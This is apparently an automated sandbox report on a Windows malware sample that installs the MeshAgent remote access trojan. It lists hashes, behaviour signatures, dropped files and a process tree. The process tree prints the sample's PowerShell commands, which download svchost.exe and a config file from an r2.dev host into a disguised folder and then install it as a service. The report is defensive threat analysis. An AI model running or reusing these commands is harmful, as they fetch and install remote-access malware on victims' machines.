Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2024 07:04

General

  • Target

    2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe

  • Size

    10.1MB

  • MD5

    8fd2994edebc3a3ddde2a14b3f5c4183

  • SHA1

    51b0c1f0e5d9a1486ee49bf25e544e626a5c86c0

  • SHA256

    c4c71ad59b09f47d5d8c1f1ba54a358d1793706f00651867fb171e8f4d2912b4

  • SHA512

    62620e6d802471ae663c89916f12fd3b68931cb141d80dc2444129f2d1b3f56a9a1630028d18ea08c6c8a595538bf114d24cb56269812f8bfd3c06c3ec1464eb

  • SSDEEP

    196608:9RFHibb0Dpz7Omna1cCwvylAjWZ0Xq9YLuxMfCVb2XGh22KNL7P+wherA+O7f:tibgDpz7TnaqtvylAjWZ0Xq9YLuxMfC4

Malware Config

Signatures

  • Detects MeshAgent payload 5 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 52 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "New-Item -ItemType Directory -Force -Path C:\Users\Admin\AppData\local\svchost"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -uninstall"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.exe -OutFile C:\Users\Admin\AppData\local\svchost\svchost.exe"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.msh -OutFile C:\Users\Admin\AppData\local\svchost\svchost.msh"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -install"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1480
        • C:\Users\Admin\AppData\local\svchost\svchost.exe
          "C:\Users\Admin\AppData\local\svchost\svchost.exe" -install
          4⤵
          • Sets service image path in registry
          • Executes dropped EXE
          PID:3284
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c explorer.exe "_가이아서버 접속기.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4564
      • C:\Windows\explorer.exe
        explorer.exe "_가이아서버 접속기.exe"
        3⤵
          PID:3564
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3388
      • C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
        "C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:60
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 420
          3⤵
          • Program crash
          PID:4296
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 60 -ip 60
      1⤵
        PID:4580
      • C:\Users\Admin\AppData\local\svchost\svchost.exe
        "C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:668
        • C:\Windows\System32\wbem\wmic.exe
          wmic SystemEnclosure get ChassisTypes
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4340
        • C:\Windows\system32\wbem\wmic.exe
          wmic os get oslanguage /FORMAT:LIST
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4972
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4292
        • C:\Windows\system32\wbem\wmic.exe
          wmic os get oslanguage /FORMAT:LIST
          2⤵
            PID:4968
          • C:\Windows\System32\wbem\wmic.exe
            wmic SystemEnclosure get ChassisTypes
            2⤵
              PID:1452
            • C:\Windows\System32\wbem\wmic.exe
              wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
              2⤵
                PID:4872
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -noprofile -nologo -command -
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                PID:1536

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              2KB

              MD5

              6cf293cb4d80be23433eecf74ddb5503

              SHA1

              24fe4752df102c2ef492954d6b046cb5512ad408

              SHA256

              b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

              SHA512

              0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              64B

              MD5

              1a11402783a8686e08f8fa987dd07bca

              SHA1

              580df3865059f4e2d8be10644590317336d146ce

              SHA256

              9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

              SHA512

              5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              96ff1ee586a153b4e7ce8661cabc0442

              SHA1

              140d4ff1840cb40601489f3826954386af612136

              SHA256

              0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

              SHA512

              3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              e5063fb2c6625068c1224c68b5c1ce46

              SHA1

              8867a7637689af271e445a7379c810335591e708

              SHA256

              2bfdeab5f252777c7bbbb7b8b033e03e37d3e2061dce73c8af03c196e1b26bfe

              SHA512

              ad62e5268c8fe5b7b72d40d8724ab7ae2fa3d3e910122ad36f61e6c1ec81c22e1ef3b4477006085212b20342aa073ee2275e0095e92c4ac350df6814149aca58

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              8a12c129e02e3d0e0ff14020158d6e53

              SHA1

              383434d0df826622f06b1f3811124782df21507b

              SHA256

              e0c11799edb944329f9ec85fd54a7038ea7df63d6a07162bc36fc03edb1bceb7

              SHA512

              4b6f2a88fc882ea9c05e9d8819114e35f30deae4366eafd1ec509d87cb02a26f2441b987272713725cbab9684233309e084802e7475876917fe9d6ab9e9cd05d

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1yp0eioo.pub.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe

              Filesize

              2.7MB

              MD5

              c5fc53d3969bea56dc506c473b805c13

              SHA1

              7c59712142fe98d48ca6276851ee890585c9772a

              SHA256

              21956ec4108a00fc6aae28ffa52ebb3dd76a1d9d1adac9648df2a6354646052c

              SHA512

              79d45c966c534831b26e71b48f0a0690a8a61e4d47998deb1b2e35fb50a26fdea072db34805c7e1db35f105e3bd062f05094b102d5d6290bfa20c0847485856b

            • C:\Users\Admin\AppData\Local\svchost\svchost.db.tmp

              Filesize

              131KB

              MD5

              72085bad44dad6707a598fd489c6850d

              SHA1

              37f2e77c5a5e1981c2753b974017d1842965f910

              SHA256

              cc591d737cad43ec26a49ddb9128c42d709b0f0cff9630b77c963a263439e56f

              SHA512

              0be7a5c2c1d351f4d041b9525c307dcdb8f365c543e7d1eb44761812458895be65f776c8dd5cc85ddfe9defe922f5c468ff266c242ccc895b928f388b70552ca

            • C:\Users\Admin\AppData\local\svchost\svchost.exe

              Filesize

              1.6MB

              MD5

              400b9faa5f261a5a0d194e633483571c

              SHA1

              b5bf2b5692d6e2eb800406d77a5f1de6a852ede8

              SHA256

              1dbe9d36ce4a1dfb469fb20c1b2b8964e5e08a96f3cf46ba6bdfc27247d97b65

              SHA512

              3cce6f30a3c2c2b09d13292d0de3fc0809f3617874e642b914ec9ee3982a915d20bfd25b9db40e3dc63b390ffcb9ef57654b9d82760b4a2ab3f4cc76914164d5

            • C:\Users\Admin\AppData\local\svchost\svchost.msh

              Filesize

              22KB

              MD5

              90f91efb0b6cc632ea6b2bb3a6d5fb40

              SHA1

              e46a39e7252e086f34d64c3d720442cd325de506

              SHA256

              7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9

              SHA512

              f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928

            • memory/60-42-0x0000000000890000-0x0000000000B4C000-memory.dmp

              Filesize

              2.7MB

            • memory/668-134-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

              Filesize

              3.5MB

            • memory/668-123-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

              Filesize

              3.5MB

            • memory/668-122-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

              Filesize

              3.5MB

            • memory/668-85-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

              Filesize

              3.5MB

            • memory/3284-81-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

              Filesize

              3.5MB

            • memory/3284-87-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

              Filesize

              3.5MB

            • memory/3636-2-0x00007FFA10103000-0x00007FFA10105000-memory.dmp

              Filesize

              8KB

            • memory/3636-17-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

              Filesize

              10.8MB

            • memory/3636-84-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

              Filesize

              10.8MB

            • memory/3636-80-0x00007FFA10103000-0x00007FFA10105000-memory.dmp

              Filesize

              8KB

            • memory/3636-13-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

              Filesize

              10.8MB

            • memory/3636-90-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

              Filesize

              10.8MB

            • memory/3636-14-0x0000024773320000-0x0000024773364000-memory.dmp

              Filesize

              272KB

            • memory/3636-15-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

              Filesize

              10.8MB

            • memory/3636-3-0x0000024772E10000-0x0000024772E32000-memory.dmp

              Filesize

              136KB

            • memory/3636-16-0x0000024773370000-0x00000247733E6000-memory.dmp

              Filesize

              472KB